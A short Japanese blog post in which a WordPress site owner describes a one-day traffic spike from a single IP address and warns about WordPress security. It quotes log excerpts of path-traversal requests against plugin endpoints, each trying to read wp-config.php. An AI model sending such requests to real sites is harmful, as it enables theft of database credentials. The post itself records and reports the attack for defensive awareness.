WordPressのセキュリティには注意してください
WordPressサイトのログを見ていたら、1日だけ異常に多くのアクセスがあり、しかも、その日のアクセスの大半が1つのIPアドレスという事からちょっと詳しく調べてみました。
パッと見て目に付くのがwp-config.php関係のアクセスの多さです。一部を抽出すると次のような感じのログでした。
getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php download.php?file=..%2F..%2F..%2F..%2Fwp-config.php general.php?file=wp-config.php admin-ajax.php?action=..%2Fwp-config.php pdf.php?fn=.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php macdownload.php?albid=..%2F..%2F..%2Fwp-config.php ?mdocs-img-preview=wp-config.php ?wpv-image=wp-config.php ?mdocs-img-preview=..%2Fwp-config.php